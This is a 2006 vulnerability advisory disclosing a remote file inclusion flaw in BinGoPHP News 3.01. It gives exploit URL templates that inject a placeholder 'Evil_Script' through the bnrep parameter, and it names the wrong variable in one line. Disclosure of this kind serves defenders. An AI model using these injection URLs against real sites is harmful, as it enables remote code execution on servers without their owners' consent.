BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

2006-09-08T00:00:00
ID SECURITYVULNS:DOC:14194
Type securityvulns
Reporter Securityvulns
Modified 2006-09-08T00:00:00

Description


BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net : Remote : Yes Critical Level : Dangerous


Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : BinGoPHP News version : 3.01 URL : http://www.comscripts.com/jump.php?action=script&id=1382


Exploit: ~~~~~~ Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca n exploit this vulnerability with a simple php injection script.

http://www.site.com/[path]/bp_ncom.php?bnrep=[Evil_Script]

http://www.site.com/[path]/bp_news.php?bnrep=[Evil_Script]


Solution : ~~~~~~~~ declare variabel $bnrep


Shoutz: ~~~~

Special greetz to my good friend [Oo]

To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]


*/

Contact: ~~~~~~

Nick: Kw3rLn E-mail: ciriboflacs[at]YaHoo[dot]Com Homepage: hTTp://RST-CREW.NET _/*

-------------------------------- [ EOF] ----------------------------------